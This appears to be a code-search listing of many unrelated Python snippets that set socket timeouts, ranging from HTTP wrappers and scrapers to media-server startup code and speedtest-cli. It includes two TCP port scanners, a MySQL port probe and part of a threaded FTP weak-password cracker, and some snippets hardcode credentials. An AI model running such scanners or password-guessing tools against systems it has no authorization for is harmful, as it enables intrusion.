    :param stream: Stream content instead of fetching it all at once.
    :type stream: bool
    :returns: Response object
    :rtype: :class:`Response`


    The ``files`` argument is a dictionary::

        {'fieldname' : { 'filename': 'blah.txt',
                         'content': '<binary data>',
                         'mimetype': 'text/plain'}
        }

    * ``fieldname`` is the name of the field in the HTML form.
    * ``mimetype`` is optional. If not provided, :mod:`mimetypes` will
      be used to guess the mimetype, or ``application/octet-stream``
      will be used.

    """
    # TODO: cookies
    socket.setdefaulttimeout(timeout)

    # Default handlers
    openers = [request3.ProxyHandler(request3.getproxies())]

    if not allow_redirects:
        openers.append(NoRedirectHandler())

    if auth is not None:  # Add authorisation handler
        username, password = auth
        password_manager = request3.HTTPPasswordMgrWithDefaultRealm()
        password_manager.add_password(None, url, username, password)
        auth_manager = request3.HTTPBasicAuthHandler(password_manager)
        openers.append(auth_manager)

    # Install our custom chain of openers
    opener = request3.build_opener(*openers)
    request3.install_opener(opener)

    if not headers:
        headers = CaseInsensitiveDictionary()
    else:
        headers = CaseInsensitiveDictionary(headers)

    if 'user-agent' not in headers:
        headers['user-agent'] = USER_AGENT

    # Accept gzip-encoded content
    encodings = [
        s.strip() for s in headers.get('accept-encoding', '').split(',')
    ]
    if 'gzip' not in encodings:
        encodings.append('gzip')

    headers['accept-encoding'] = ', '.join(encodings)

    if files:
        if not data:
            data = {}
        new_headers, data = encode_multipart_formdata(data, files)
        headers.update(new_headers)
    elif data and isinstance(data, dict):
        data = urlparse.urlencode(str_dict(data))

    # Make sure everything is encoded text
    headers = str_dict(headers)

    # if isinstance(url, str):
    #     url = url.encode('utf-8')

    if params:  # GET args (POST args are handled in encode_multipart_formdata)

        scheme, netloc, path, query, fragment = urlparse.urlsplit(url)

        if query:  # Combine query string and `params`
            url_params = urlparse.parse_qs(query)
            # `params` take precedence over URL query string
            url_params.update(params)
            params = url_params

        query = urlparse.urlencode(str_dict(params), doseq=True)
        url = urlparse.urlunsplit((scheme, netloc, path, query, fragment))

    req = Request(url, data, headers, method=method)
    return Response(req, stream)
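A hedged usage sketch for the wrapper above; the URL and query parameters are placeholders, and nothing is assumed about the Response object beyond what the signature returns:

# Placeholder call: GET with query parameters and a 30-second default socket timeout.
resp = request('GET', 'https://example.com/api/search', params={'q': 'socket'}, timeout=30)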
Example #38
#!/usr/bin/python
# -*- coding: utf-8 -*-
import urllib, urllib2, re, xbmcplugin, xbmcgui, sys, xbmcaddon, base64, socket

socket.setdefaulttimeout(30)
pluginhandle = int(sys.argv[1])
addon = xbmcaddon.Addon(id='plugin.video.ign_com')
translation = addon.getLocalizedString

maxVideoQuality = addon.getSetting("maxVideoQualityRes")
forceViewMode = addon.getSetting("forceViewMode")
if forceViewMode == "true":
    forceViewMode = True
else:
    forceViewMode = False
viewMode = str(addon.getSetting("viewMode"))

maxVideoHeight = [360, 540, 720, 1080][int(maxVideoQuality)]
maxVideoBitrate = [1000000, 1500000, 2500000, 5000000][int(maxVideoQuality)]
maxVideoQuality = [640, 960, 1280, 1920][int(maxVideoQuality)]


def index():
    addDir(translation(30002),
           "http://www.ign.com/videos/all/filtergalleryajax?filter=all",
           'listVideos', "")
    addDir("IGN Daily Fix", "http://www.ign.com/videos/series/ign-daily-fix",
           'listVideos', "")
    addDir("IGN Live", "http://www.ign.com/videos/series/ign-live",
           'listVideos', "")
    addDir("IGN First",
Example #39
#coding:utf-8:
import urllib
import re
import download
import socket

socket.setdefaulttimeout(10.0)


def get_information(url):
    list = []
    try:
        response = urllib.urlopen(url)
        test = response.read()
    except Exception, e:
        test = ''
        pass

    m1 = re.search('data-name="(.*?)"', test)
    try:
        name = m1.group(1)  # apk file name
    except Exception, e:
        name = '0'

    m2 = re.search('href="(.*?)".*?下载 APK 文件', test)  # matches the "下载 APK 文件" ("Download APK file") link
    try:
        down_url = m2.group(1)
    except Exception, e:
        down_url = '0'

    url = down_url  # download url
Example #40
    def start(self):
        self.started = True

        # thread name
        threading.currentThread().setName('CORE')

        # patch modules with encoding kludge
        patch_modules()

        # init core classes
        self.notifier_providers = NotifierProviders()
        self.metadata_providers = MetadataProviders()
        self.search_providers = SearchProviders()
        self.log = Logger()
        self.config = Config()
        self.api = API()
        self.alerts = Notifications()
        self.main_db = MainDB()
        self.cache_db = CacheDB()
        self.failed_db = FailedDB()
        self.scheduler = BackgroundScheduler()
        self.wserver = WebServer()
        self.wsession = WebSession()
        self.google_auth = GoogleAuth()
        self.name_cache = NameCache()
        self.show_queue = ShowQueue()
        self.search_queue = SearchQueue()
        self.postprocessor_queue = PostProcessorQueue()
        self.version_updater = VersionUpdater()
        self.show_updater = ShowUpdater()
        self.daily_searcher = DailySearcher()
        self.failed_snatch_searcher = FailedSnatchSearcher()
        self.backlog_searcher = BacklogSearcher()
        self.proper_searcher = ProperSearcher()
        self.trakt_searcher = TraktSearcher()
        self.subtitle_searcher = SubtitleSearcher()
        self.auto_postprocessor = AutoPostProcessor()


        # Check if we need to perform a restore first
        if os.path.exists(os.path.abspath(os.path.join(self.data_dir, 'restore'))):
            success = restoreSR(os.path.abspath(os.path.join(self.data_dir, 'restore')), self.data_dir)
            print("Restoring SiCKRAGE backup: %s!\n" % ("FAILED", "SUCCESSFUL")[success])
            if success:
                shutil.rmtree(os.path.abspath(os.path.join(self.data_dir, 'restore')), ignore_errors=True)

        # migrate old database file names to new ones
        if os.path.isfile(os.path.abspath(os.path.join(self.data_dir, 'sickbeard.db'))):
            if os.path.isfile(os.path.join(self.data_dir, 'sickrage.db')):
                helpers.moveFile(os.path.join(self.data_dir, 'sickrage.db'),
                                 os.path.join(self.data_dir, '{}.bak-{}'
                                              .format('sickrage.db',
                                                      datetime.datetime.now().strftime(
                                                          '%Y%m%d_%H%M%S'))))

            helpers.moveFile(os.path.abspath(os.path.join(self.data_dir, 'sickbeard.db')),
                             os.path.abspath(os.path.join(self.data_dir, 'sickrage.db')))

        # load config
        self.config.load()

        # set language
        self.config.change_gui_lang(self.config.gui_lang)

        # set socket timeout
        socket.setdefaulttimeout(self.config.socket_timeout)

        # setup logger settings
        self.log.logSize = self.config.log_size
        self.log.logNr = self.config.log_nr
        self.log.logFile = os.path.join(self.data_dir, 'logs', 'sickrage.log')
        self.log.debugLogging = self.config.debug
        self.log.consoleLogging = not self.quite

        # start logger
        self.log.start()

        # user agent
        if self.config.random_user_agent:
            self.user_agent = UserAgent().random

        urlparse.uses_netloc.append('scgi')
        urllib.FancyURLopener.version = self.user_agent

        # Check available space
        try:
            total_space, available_space = getFreeSpace(self.data_dir)
            if available_space < 100:
                self.log.error('Shutting down as SiCKRAGE needs some space to work. You\'ll get corrupted data '
                               'otherwise. Only %sMB left', available_space)
                return
        except Exception:
            self.log.error('Failed getting diskspace: %s', traceback.format_exc())

        # perform database startup actions
        for db in [self.main_db, self.cache_db, self.failed_db]:
            # initialize database
            db.initialize()

            # check integrity of database
            db.check_integrity()

            # migrate database
            db.migrate()

            # misc database cleanups
            db.cleanup()

        # compact main database
        if not sickrage.app.developer and self.config.last_db_compact < time.time() - 604800:  # 7 days
            self.main_db.compact()
            self.config.last_db_compact = int(time.time())

        # load name cache
        self.name_cache.load()

        # load data for shows from database
        self.load_shows()

        if self.config.default_page not in ('home', 'schedule', 'history', 'news', 'IRC'):
            self.config.default_page = 'home'

        # cleanup cache folder
        for folder in ['mako', 'sessions', 'indexers']:
            try:
                shutil.rmtree(os.path.join(sickrage.app.cache_dir, folder), ignore_errors=True)
            except Exception:
                continue

        # init anidb connection
        if self.config.use_anidb:
            def anidb_logger(msg):
                return self.log.debug("AniDB: {} ".format(msg))

            try:
                self.adba_connection = adba.Connection(keepAlive=True, log=anidb_logger)
                self.adba_connection.auth(self.config.anidb_username, self.config.anidb_password)
            except Exception as e:
                self.log.warning("AniDB exception msg: %r " % repr(e))

        if self.config.web_port < 21 or self.config.web_port > 65535:
            self.config.web_port = 8081

        if not self.config.web_cookie_secret:
            self.config.web_cookie_secret = generateCookieSecret()

        # attempt to help prevent users from breaking links by using a bad url
        if not self.config.anon_redirect.endswith('?'):
            self.config.anon_redirect = ''

        if not re.match(r'\d+\|[^|]+(?:\|[^|]+)*', self.config.root_dirs):
            self.config.root_dirs = ''

        self.config.naming_force_folders = check_force_season_folders()

        if self.config.nzb_method not in ('blackhole', 'sabnzbd', 'nzbget'):
            self.config.nzb_method = 'blackhole'

        if self.config.torrent_method not in ('blackhole', 'utorrent', 'transmission', 'deluge', 'deluged',
                                              'download_station', 'rtorrent', 'qbittorrent', 'mlnet', 'putio'):
            self.config.torrent_method = 'blackhole'

        if self.config.autopostprocessor_freq < self.config.min_autopostprocessor_freq:
            self.config.autopostprocessor_freq = self.config.min_autopostprocessor_freq
        if self.config.daily_searcher_freq < self.config.min_daily_searcher_freq:
            self.config.daily_searcher_freq = self.config.min_daily_searcher_freq
        self.config.min_backlog_searcher_freq = self.backlog_searcher.get_backlog_cycle_time()
        if self.config.backlog_searcher_freq < self.config.min_backlog_searcher_freq:
            self.config.backlog_searcher_freq = self.config.min_backlog_searcher_freq
        if self.config.version_updater_freq < self.config.min_version_updater_freq:
            self.config.version_updater_freq = self.config.min_version_updater_freq
        if self.config.subtitle_searcher_freq < self.config.min_subtitle_searcher_freq:
            self.config.subtitle_searcher_freq = self.config.min_subtitle_searcher_freq
        if self.config.failed_snatch_age < self.config.min_failed_snatch_age:
            self.config.failed_snatch_age = self.config.min_failed_snatch_age
        if self.config.proper_searcher_interval not in ('15m', '45m', '90m', '4h', 'daily'):
            self.config.proper_searcher_interval = 'daily'
        if self.config.showupdate_hour < 0 or self.config.showupdate_hour > 23:
            self.config.showupdate_hour = 0
        if self.config.subtitles_languages[0] == '':
            self.config.subtitles_languages = []

        # add version checker job
        self.scheduler.add_job(
            self.version_updater.run,
            IntervalTrigger(
                hours=self.config.version_updater_freq
            ),
            name=self.version_updater.name,
            id=self.version_updater.name
        )

        # add network timezones updater job
        self.scheduler.add_job(
            update_network_dict,
            IntervalTrigger(
                days=1
            ),
            name="TZUPDATER",
            id="TZUPDATER"
        )

        # add show updater job
        self.scheduler.add_job(
            self.show_updater.run,
            IntervalTrigger(
                days=1,
                start_date=datetime.datetime.now().replace(hour=self.config.showupdate_hour)
            ),
            name=self.show_updater.name,
            id=self.show_updater.name
        )

        # add daily search job
        self.scheduler.add_job(
            self.daily_searcher.run,
            IntervalTrigger(
                minutes=self.config.daily_searcher_freq,
                start_date=datetime.datetime.now() + datetime.timedelta(minutes=4)
            ),
            name=self.daily_searcher.name,
            id=self.daily_searcher.name
        )

        # add failed snatch search job
        self.scheduler.add_job(
            self.failed_snatch_searcher.run,
            IntervalTrigger(
                hours=1,
                start_date=datetime.datetime.now() + datetime.timedelta(minutes=4)
            ),
            name=self.failed_snatch_searcher.name,
            id=self.failed_snatch_searcher.name
        )

        # add backlog search job
        self.scheduler.add_job(
            self.backlog_searcher.run,
            IntervalTrigger(
                minutes=self.config.backlog_searcher_freq,
                start_date=datetime.datetime.now() + datetime.timedelta(minutes=30)
            ),
            name=self.backlog_searcher.name,
            id=self.backlog_searcher.name
        )

        # add auto-postprocessing job
        self.scheduler.add_job(
            self.auto_postprocessor.run,
            IntervalTrigger(
                minutes=self.config.autopostprocessor_freq
            ),
            name=self.auto_postprocessor.name,
            id=self.auto_postprocessor.name
        )

        # add find proper job
        self.scheduler.add_job(
            self.proper_searcher.run,
            IntervalTrigger(
                minutes={'15m': 15, '45m': 45, '90m': 90, '4h': 4 * 60, 'daily': 24 * 60}[
                    self.config.proper_searcher_interval]
            ),
            name=self.proper_searcher.name,
            id=self.proper_searcher.name
        )

        # add trakt.tv checker job
        self.scheduler.add_job(
            self.trakt_searcher.run,
            IntervalTrigger(
                hours=1
            ),
            name=self.trakt_searcher.name,
            id=self.trakt_searcher.name
        )

        # add subtitles finder job
        self.scheduler.add_job(
            self.subtitle_searcher.run,
            IntervalTrigger(
                hours=self.config.subtitle_searcher_freq
            ),
            name=self.subtitle_searcher.name,
            id=self.subtitle_searcher.name
        )

        # start scheduler service
        self.scheduler.start()

        # Pause/Resume PROPERSEARCHER job
        (self.scheduler.get_job(self.proper_searcher.name).pause,
         self.scheduler.get_job(self.proper_searcher.name).resume
         )[self.config.download_propers]()

        # Pause/Resume TRAKTSEARCHER job
        (self.scheduler.get_job(self.trakt_searcher.name).pause,
         self.scheduler.get_job(self.trakt_searcher.name).resume
         )[self.config.use_trakt]()

        # Pause/Resume SUBTITLESEARCHER job
        (self.scheduler.get_job(self.subtitle_searcher.name).pause,
         self.scheduler.get_job(self.subtitle_searcher.name).resume
         )[self.config.use_subtitles]()

        # Pause/Resume POSTPROCESS job
        (self.scheduler.get_job(self.auto_postprocessor.name).pause,
         self.scheduler.get_job(self.auto_postprocessor.name).resume
         )[self.config.process_automatically]()

        # Pause/Resume FAILEDSNATCHSEARCHER job
        (self.scheduler.get_job(self.failed_snatch_searcher.name).pause,
         self.scheduler.get_job(self.failed_snatch_searcher.name).resume
         )[self.config.use_failed_snatcher]()

        # start queue's
        self.search_queue.start()
        self.show_queue.start()
        self.postprocessor_queue.start()

        # start webserver
        self.wserver.start()
Example #41
import cx_Oracle as cx
import urllib
from urllib.request import Request, urlopen
from apscheduler.schedulers.blocking import BlockingScheduler
from apscheduler.triggers.interval import IntervalTrigger
from apscheduler.triggers.cron import CronTrigger
from loger import make_log
from datetime import datetime, date, timedelta

# work around encoding issues
importlib.reload(sys)
os.environ['NLS_LANG'] = 'Simplified Chinese_CHINA.ZHS16GBK'

# work around the host dropping idle connections
import socket
socket.setdefaulttimeout(20)  # set the socket-layer timeout to 20 seconds

logger = make_log('us_epidemic', 'github_epidemic')

# with a proxy
proxy = 'zzy:[email protected]:80'
proxy_handler = {'http': 'http://' + proxy, 'https': 'https://' + proxy}


# without a proxy
def get_data(url):
    firefox_headers = {
        'User-Agent':
        'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0'
    }
    # response = urlopen(url=url, timeout=60)
Example #42
 def setTimeOut(self, timeout=6.0):
     """Set the time to wait for a response from the server."""
     self.timeout = timeout
     socket.setdefaulttimeout(self.timeout)
Example #43
#!/usr/bin/env python3
import socket
import sys
from datetime import datetime
from contextlib import closing

socket.setdefaulttimeout(.001)
remoteServerIP = input("Enter IP Addr to Scan: ")

print("-" * 45)
print("\tPlease Wait... Scanning ")
print("-" * 45)

start = datetime.now()

try:
    for port in range(1, 1023):
        with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
            result = s.connect_ex((remoteServerIP, port))

            if result == 0:
                # connection found
                print("[+] Port %d: \tOpen" % (port))

            else:
                # No connection found
                print("[-] Port %d: \tClosed" % (port))

except KeyboardInterrupt:
    print("\n\tTerminating Scan ...")
    sys.exit()
Example #44
                            else:
                                #reset retry
                                account = None  #None=NULL
                                retry = 0
 
 
        threads = []
        for i in range(nthreads):  # nthreads=10: create 10 threads
            threads.append(crackThread(self.writer,self.logger))  # writer=ftp_result.csv, logfile='ftp_errorlog.log'
 
        for thread in threads:   # (original author's note) unsure what this means -- is it ending the threads?
            thread.start()  # start() launches the thread
         
        for thread in threads:   # (original author's note) unsure what this means -- is it ending the threads?
            thread.join()
        print u"扫描结束"  # "scan finished"
 
 
 
if __name__ == '__main__':
    import sys
    import socket
    socket.setdefaulttimeout(10)  # set the global default timeout
     
    if len(sys.argv)!=2:
        print u'PythonFtpScanner V1.0  by redice\n'
        # usage text: "Usage: PythonFtpScanner.py ftp.redicecn.com -- a domain name is recommended as the argument; the weak-password dictionary supports the domain variable"
        print u'用法:\n\tPythonFtpScanner.py ftp.redicecn.com \n\n注意:\n\t建议使用域名作为参数。\n\t弱口令字典支持域变量。'
    else:
        ftp_cracker = PythonFtpScanner()  # instantiate the scanner class
        ftp_cracker.ftp_login(sys.argv[1].strip())  # pass in the domain to scan
        print u'\n所有扫描!结果在 ftp_result.csv'  # "all scans done! results are in ftp_result.csv"
Example #45
import csv  # standard-library module
import socket
import urllib.request as request
from logging import getLogger, INFO
from concurrent_log_handler import ConcurrentRotatingFileHandler
import os
import multiprocessing as multip, time
from multiprocessing import Process, Pipe, Event, Condition, Lock, Pool, Value, Array

socket.setdefaulttimeout(120)

log = getLogger()
# Use an absolute path to prevent file rotation trouble.
logfile = os.path.abspath("wo.log")
# Rotate log after reaching 512K, keep 5 old copies.
rotateHandler = ConcurrentRotatingFileHandler(logfile, "a", 512 * 1024, 5)
log.addHandler(rotateHandler)
log.setLevel(INFO)


def mkdir(path):
    # strip leading and trailing whitespace
    path = path.strip()
    # strip a trailing \ character
    path = path.rstrip("\\")
    # check whether the path exists:
    # exists          -> True
    # does not exist  -> False
    isExists = os.path.exists(path)
    # act on the result
    if not isExists:
Example #46
def request(method,
            url,
            params=None,
            data=None,
            headers=None,
            cookies=None,
            files=None,
            auth=None,
            timeout=60,
            allow_redirects=False):
    """Initiate an HTTP(S) request. Returns :class:`Response` object.

    :param method: 'GET' or 'POST'
    :type method: ``unicode``
    :param url: URL to open
    :type url: ``unicode``
    :param params: mapping of URL parameters
    :type params: ``dict``
    :param data: mapping of form data ``{'field_name': 'value'}`` or ``str``
    :type data: ``dict`` or ``str``
    :param headers: HTTP headers
    :type headers: ``dict``
    :param cookies: cookies to send to server
    :type cookies: ``dict``
    :param files: files to upload
    :type files: ``dict``
    :param auth: username, password
    :type auth: ``tuple``
    :param timeout: connection timeout limit in seconds
    :type timeout: ``int``
    :param allow_redirects: follow redirections
    :type allow_redirects: ``Boolean``
    :returns: :class:`Response` object

    """

    socket.setdefaulttimeout(timeout)

    # Default handlers
    openers = []

    if not allow_redirects:
        openers.append(NoRedirectHandler())

    if auth:  # Add authorisation handler
        username, password = auth
        password_manager = urllib2.HTTPPasswordMgrWithDefaultRealm()
        password_manager.add_password(None, url, username, password)
        auth_manager = urllib2.HTTPBasicAuthHandler(password_manager)
        openers.append(auth_manager)

    # Install our custom chain of openers
    opener = urllib2.build_opener(*openers)
    urllib2.install_opener(opener)

    if not headers:
        headers = {}
    if 'User-Agent' not in headers:
        headers['User-Agent'] = USER_AGENT

    if files:
        if not data:
            data = {}
        new_headers, data = encode_multipart_formdata(data, files)
        headers.update(new_headers)
    elif data and isinstance(data, dict):
        data = urllib.urlencode(str_dict(data))

    # Make sure everything is encoded text
    headers = str_dict(headers)

    if isinstance(url, unicode):
        url = url.encode('utf-8')

    if params:  # GET args (POST args are handled in encode_multipart_formdata)
        url = url + '?' + urllib.urlencode(str_dict(params))

    req = urllib2.Request(url, data, headers)
    return Response(req)
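
# Usage sketch (hypothetical values; the Response object returned above is
# defined elsewhere in this module and its interface is not shown here):
resp = request('GET',
               'https://api.example.com/search',
               params={'q': 'socket timeout'},
               headers={'Accept': 'application/json'},
               timeout=30,
               allow_redirects=True)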
Exemple #47
0
def speedtest():
    """Run the full speedtest.net test"""

    global shutdown_event, source, scheme
    shutdown_event = threading.Event()

    signal.signal(signal.SIGINT, ctrl_c)

    description = (
        'Command line interface for testing internet bandwidth using '
        'speedtest.net.\n'
        '------------------------------------------------------------'
        '--------------\n'
        'https://github.com/sivel/speedtest-cli')

    parser = ArgParser(description=description)
    # Give optparse.OptionParser an `add_argument` method for
    # compatibility with argparse.ArgumentParser
    try:
        parser.add_argument = parser.add_option
    except AttributeError:
        pass
    parser.add_argument('--bytes',
                        dest='units',
                        action='store_const',
                        const=('byte', 1),
                        default=('bit', 8),
                        help='Display values in bytes instead of bits. Does '
                        'not affect the image generated by --share')
    parser.add_argument('--share',
                        action='store_true',
                        help='Generate and provide a URL to the speedtest.net '
                        'share results image')
    parser.add_argument('--simple',
                        action='store_true',
                        help='Suppress verbose output, only show basic '
                        'information')
    parser.add_argument('--list',
                        action='store_true',
                        help='Display a list of speedtest.net servers '
                        'sorted by distance')
    parser.add_argument('--server', help='Specify a server ID to test against')
    parser.add_argument('--mini', help='URL of the Speedtest Mini server')
    parser.add_argument('--source', help='Source IP address to bind to')
    parser.add_argument('--timeout',
                        default=10,
                        type=int,
                        help='HTTP timeout in seconds. Default 10')
    parser.add_argument('--secure',
                        action='store_true',
                        help='Use HTTPS instead of HTTP when communicating '
                        'with speedtest.net operated servers')
    parser.add_argument('--version',
                        action='store_true',
                        help='Show the version number and exit')

    options = parser.parse_args()
    if isinstance(options, tuple):
        args = options[0]
    else:
        args = options
    del options

    # Print the version and exit
    if args.version:
        version()

    socket.setdefaulttimeout(args.timeout)

    # Pre-cache the user agent string
    build_user_agent()

    # If specified bind to a specific IP address
    if args.source:
        source = args.source
        socket.socket = bound_socket

    if args.secure:
        scheme = 'https'

    if not args.simple:
        print_('Retrieving speedtest.net configuration...')
    try:
        config = getConfig()
    except URLError:
        print_('Cannot retrieve speedtest configuration')
        sys.exit(1)

    if not args.simple:
        print_('Retrieving speedtest.net server list...')
    if args.list or args.server:
        servers = closestServers(config['client'], True)
        if args.list:
            serverList = []
            for server in servers:
                line = ('%(id)4s) %(sponsor)s (%(name)s, %(country)s) '
                        '[%(d)0.2f km]' % server)
                serverList.append(line)
            print_('\n'.join(serverList).encode('utf-8', 'ignore'))
            sys.exit(0)
    else:
        servers = closestServers(config['client'])

    if not args.simple:
        print_('Testing from %(isp)s (%(ip)s)...' % config['client'])

    if args.server:
        try:
            best = getBestServer(
                filter(lambda x: x['id'] == args.server, servers))
        except IndexError:
            print_('Invalid server ID')
            sys.exit(1)
    elif args.mini:
        name, ext = os.path.splitext(args.mini)
        if ext:
            url = os.path.dirname(args.mini)
        else:
            url = args.mini
        urlparts = urlparse(url)
        try:
            request = build_request(args.mini)
            f = urlopen(request)
        except:
            print_('Invalid Speedtest Mini URL')
            sys.exit(1)
        else:
            text = f.read()
            f.close()
        extension = re.findall('upload_extension: "([^"]+)"', text.decode())
        if not extension:
            for ext in ['php', 'asp', 'aspx', 'jsp']:
                try:
                    request = build_request('%s/speedtest/upload.%s' %
                                            (args.mini, ext))
                    f = urlopen(request)
                except:
                    pass
                else:
                    data = f.read().strip()
                    if (f.code == 200 and len(data.splitlines()) == 1
                            and re.match('size=[0-9]', data)):
                        extension = [ext]
                        break
        if not urlparts or not extension:
            print_('Please provide the full URL of your Speedtest Mini server')
            sys.exit(1)
        servers = [{
            'sponsor':
            'Speedtest Mini',
            'name':
            urlparts[1],
            'd':
            0,
            'url':
            '%s/speedtest/upload.%s' % (url.rstrip('/'), extension[0]),
            'latency':
            0,
            'id':
            0
        }]
        try:
            best = getBestServer(servers)
        except:
            best = servers[0]
    else:
        if not args.simple:
            print_('Selecting best server based on latency...')
        best = getBestServer(servers)

    if not args.simple:
        print_(('Hosted by %(sponsor)s (%(name)s) [%(d)0.2f km]: '
                '%(latency)s ms' % best).encode('utf-8', 'ignore'))
    else:
        print_('Ping: %(latency)s ms' % best)

    sizes = [350, 500, 750, 1000, 1500, 2000, 2500, 3000, 3500, 4000]
    urls = []
    for size in sizes:
        for i in range(0, 4):
            urls.append('%s/random%sx%s.jpg' %
                        (os.path.dirname(best['url']), size, size))
    if not args.simple:
        print_('Testing download speed', end='')
    dlspeed = downloadSpeed(urls, args.simple)
    if not args.simple:
        print_()
    print_('Download: %0.2f M%s/s' %
           ((dlspeed / 1000 / 1000) * args.units[1], args.units[0]))

    sizesizes = [int(.25 * 1000 * 1000), int(.5 * 1000 * 1000)]
    sizes = []
    for size in sizesizes:
        for i in range(0, 25):
            sizes.append(size)
    if not args.simple:
        print_('Testing upload speed', end='')
    ulspeed = uploadSpeed(best['url'], sizes, args.simple)
    if not args.simple:
        print_()
    print_('Upload: %0.2f M%s/s' %
           ((ulspeed / 1000 / 1000) * args.units[1], args.units[0]))

    if args.share and args.mini:
        print_('Cannot generate a speedtest.net share results image while '
               'testing against a Speedtest Mini server')
    elif args.share:
        dlspeedk = int(round((dlspeed / 1000) * 8, 0))
        ping = int(round(best['latency'], 0))
        ulspeedk = int(round((ulspeed / 1000) * 8, 0))

        # Build the request to send results back to speedtest.net
        # We use a list instead of a dict because the API expects parameters
        # in a certain order
        apiData = [
            'download=%s' % dlspeedk,
            'ping=%s' % ping,
            'upload=%s' % ulspeedk, 'promo=',
            'startmode=%s' % 'pingselect',
            'recommendedserverid=%s' % best['id'],
            'accuracy=%s' % 1,
            'serverid=%s' % best['id'],
            'hash=%s' % md5(
                ('%s-%s-%s-%s' %
                 (ping, ulspeedk, dlspeedk, '297aae72')).encode()).hexdigest()
        ]

        headers = {'Referer': 'http://c.speedtest.net/flash/speedtest.swf'}
        request = build_request('://www.speedtest.net/api/api.php',
                                data='&'.join(apiData).encode(),
                                headers=headers)
        f, e = catch_request(request)
        if e:
            print_('Could not submit results to speedtest.net: %s' % e)
            sys.exit(1)
        response = f.read()
        code = f.code
        f.close()

        if int(code) != 200:
            print_('Could not submit results to speedtest.net')
            sys.exit(1)

        qsargs = parse_qs(response.decode())
        resultid = qsargs.get('resultid')
        if not resultid or len(resultid) != 1:
            print_('Could not submit results to speedtest.net')
            sys.exit(1)

        print_('Share results: %s://www.speedtest.net/result/%s.png' %
               (scheme, resultid[0]))
# -*- coding: utf-8 -*-

import socket

socket.setdefaulttimeout(0.1)

def main(IP):
    name = ""
    type = ""
    protocolType = ""
    protocolPort = ""
    serviceType = "MYSQL"
    servicePort = "3306"

    device = ["", IP, "", "", "", "", ""]

    try:
        # get host, will raise error if not found
        # name = socket.gethostbyaddr(IP)[0]
        device[0] = r"ipaddr-" + IP

        # type, protocolType, protocolPort
        device[2] = type
        device[3] = protocolType
        device[4] = protocolPort

        # check whether a MySQL service is running on port 3306
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        conn = s.connect_ex((IP, int(servicePort)))
        if conn == 0:
            s.close()
    default='sC')
parser.add_option('-d',
                  dest='Delay',
                  type='float',
                  help='Specify Delay Time',
                  default=0.1)
(options, args) = parser.parse_args()
port = str(options.port)
port_start, port_stop = port.split('-')
port_start = int(port_start)
port_stop = int(port_stop)
timeout = options.Delay
type_scan = options.type_scan
target = options.host

socket.setdefaulttimeout(0.53)

try:
    t_IP = socket.gethostbyname(target)
except:
    print('Cannot resolve %s: Unknown host' % target)
    exit()

if port_start > port_stop:
    print('Cannot scan this port range')
    exit()

ports = port_stop - port_start
print('Interesting {} ports on {}'.format(ports, t_IP))
print('PORT \t STATE \t\t SERVICE')
Exemple #50
0
 def __init__(self, args):
     win32serviceutil.ServiceFramework.__init__(self, args)
     self.stop_event = win32event.CreateEvent(None, 0, 0, None)
     socket.setdefaulttimeout(60)
     self.stop_requested = False
Exemple #51
0
    def __init__(self, agentConfig, emitters, systemStats, hostname):
        self.emit_duration = None
        self.agentConfig = agentConfig
        self.hostname = hostname
        # system stats is generated by config.get_system_stats
        self.agentConfig['system_stats'] = systemStats
        # agent config is used during checks, system_stats can be accessed through the config
        self.os = get_os()
        self.plugins = None
        self.emitters = emitters
        self.check_timings = agentConfig.get('check_timings')
        self.push_times = {
            'host_metadata': {
                'start': time.time(),
                'interval': int(agentConfig.get('metadata_interval', 4 * 60 * 60))
            },
            'external_host_tags': {
                'start': time.time() - 3 * 60,  # Wait for the checks to init
                'interval': int(agentConfig.get('external_host_tags', 5 * 60))
            },
            'agent_checks': {
                'start': time.time(),
                'interval': int(agentConfig.get('agent_checks_interval', 10 * 60))
            },
        }
        socket.setdefaulttimeout(15)
        self.run_count = 0
        self.continue_running = True
        self.hostname_metadata_cache = None
        self.initialized_checks_d = []
        self.init_failed_checks_d = {}

        # Unix System Checks
        self._unix_system_checks = {
            'io': u.IO(log),
            'load': u.Load(log),
            'memory': u.Memory(log),
            'processes': u.Processes(log),
            'cpu': u.Cpu(log),
            'system': u.System(log)
        }

        # Win32 System Checks
        self._win32_system_checks = {
            'io': w32.IO(log),
            'proc': w32.Processes(log),
            'memory': w32.Memory(log),
            'network': w32.Network(log),
            'cpu': w32.Cpu(log),
            'system': w32.System(log)
        }

        # Old-style metric checks
        self._ganglia = Ganglia(log)
        self._dogstream = Dogstreams.init(log, self.agentConfig)
        self._ddforwarder = DdForwarder(log, self.agentConfig)

        # Agent performance metrics check
        self._agent_metrics = None

        self._metrics_checks = []

        # Custom metric checks
        for module_spec in [s.strip() for s in self.agentConfig.get('custom_checks', '').split(',')]:
            if len(module_spec) == 0:
                continue
            try:
                self._metrics_checks.append(modules.load(module_spec, 'Check')(log))
                log.info("Registered custom check %s" % module_spec)
                log.warning("Old format custom checks are deprecated. They should be moved to the checks.d interface as old custom checks will be removed in a next version")
            except Exception:
                log.exception('Unable to load custom check module %s' % module_spec)

        # Resource Checks
        self._resources_checks = [
            ResProcesses(log, self.agentConfig)
        ]
Exemple #52
0
#coding=utf8
"""
from tansuozhe:djq002
"""
import urllib2
import HTMLParser
from BeautifulSoup import BeautifulSoup
from lxml import html
import MySQLdb
import re
import sys
import requests
import socket
import string
socket.setdefaulttimeout(8.0)
reload(sys)
sys.setdefaultencoding("utf-8")  # reload sys and set the default encoding (Python 2 idiom)


#------------------------------------------------------------------------------
#---------------------- define the MySQL helper function (step 1) ----------------------
#------------------------------------------------------------------------------
def mysqlexe(sql):
    db = MySQLdb.connect('localhost',
                         'root',
                         'djq002',
                         'joblinks',
                         charset='utf8')
    cur = db.cursor()
    cur.execute(sql)
    result = cur.fetchall()
 def _f(*args, **kwargs):
     # temporarily swap in the instance's timeout for the duration of the call
     orig_timeout = socket.getdefaulttimeout()
     socket.setdefaulttimeout(args[0].__timeout)
     try:
         result = f(*args, **kwargs)
     finally:
         # restore the previous default even if the wrapped call raises
         socket.setdefaulttimeout(orig_timeout)
     return result
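
# A fuller sketch of the decorator the _f wrapper above implies (hypothetical
# class and method names; only the save/override/restore pattern comes from the
# excerpt, which accesses the timeout via args[0].__timeout, i.e. self):
import socket

class Client(object):
    def __init__(self, timeout=6.0):
        self.__timeout = timeout

    def _with_timeout(f):
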